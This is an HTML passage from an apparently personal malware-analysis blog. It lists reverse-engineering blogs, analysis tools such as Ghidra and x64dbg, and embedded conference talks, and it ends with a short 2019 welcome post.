<li><a href="https://begin.re">https://begin.re</a></li>
</ul>
<p></br></p>
<h3>Blogs</h3>
<ul>
<li>
<p><a href="https://malwaretech.com">https://malwaretech.com</a></p>
</li>
<li>
<p><a href="https://hshrzd.wordpress.com/">https://hshrzd.wordpress.com/</a> especially <a href="https://hshrzd.wordpress.com/how-to-start/">https://hshrzd.wordpress.com/how-to-start/</a></p>
</li>
<li>
<p><a href="https://blog.malwarebytes.com/">https://blog.malwarebytes.com/</a></p>
</li>
<li>
<p><a href="https://blog.talosintelligence.com/">https://blog.talosintelligence.com/</a></p>
</li>
</ul>
<p></br>
</br></p>
<h2>Tools</h2>
<ul>
<li><a href="https://ghidra-sre.org">Ghidra SRE</a>: The RE Toolkit developed by the NSA</li>
<li><a href="https://www.hex-rays.com/products/ida/support/download_freeware.shtml">IDA Free</a>: The Freeware Version of the popular IDA Toolkit by Hex-Rays</li>
<li><a href="http://www.angusj.com/resourcehacker/">Resource Hacker</a></li>
<li><a href="https://processhacker.sourceforge.io/">Process Hacker 2</a>: Allows you to view processes with more detail than Windows Task Manager. Can also dump memory etc.</li>
<li><a href="https://hshrzd.wordpress.com/pe-bear/">PEBear</a></li>
<li><a href="https://hshrzd.wordpress.com/pe-sieve/">PESieve</a></li>
<li><a href="https://x64dbg.com/">x64Dbg</a>: x64Debug is the defacto tool for dynamic analysis and dumping</li>
<li><a href="https://github.com/horsicq/Detect-It-Easy">Detect it easy</a></li>
<li><a href="https://download.cnet.com/ExEinfo-PE/3000-2248_4-10523354.html">ExeInfo PE</a>: Similar to Detect it easy</li>
<li><a href="https://code.google.com/archive/p/lnk-parser/">LNKParser</a>: Parses Windows LNK Files</li>
<li><a href="https://blog.didierstevens.com/programs/oledump-py/">oledump</a></li>
<li><a href="https://virtualbox.org">Oracle VirtualBox</a></li>
</ul>
<p></br>
</br></p>
<h2>Videos</h2>
<p></br>
<center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/OeG4KBWB-EY" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/L8lA1pNvcz4" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://media.ccc.de/v/cpu19-20-anatomie-eines-malware-droppers-emotet-in-der-praxis/oembed" frameborder="0" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/k5ToL0J7uL0" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://media.ccc.de/v/froscon2019-2350-ghidra_-_an_open_source_reverse_engineering_tool/oembed" frameborder="0" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://media.ccc.de/v/33c3-7901-pegasus_internals/oembed" frameborder="0" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://media.ccc.de/v/35c3-9617-a_deep_dive_into_the_world_of_dos_viruses/oembed" frameborder="0" allowfullscreen></iframe></center>
</br>
</br></p>
<h1>printf("Hello World\n");</h1>
<p>Published 2019-03-18 by f0wL</p>
<p>Hey there, looks like you somehow found your way onto my new site. If you are into malware analysis, reverse engineering and that sort of jazz have a look around and stay awhile!</p>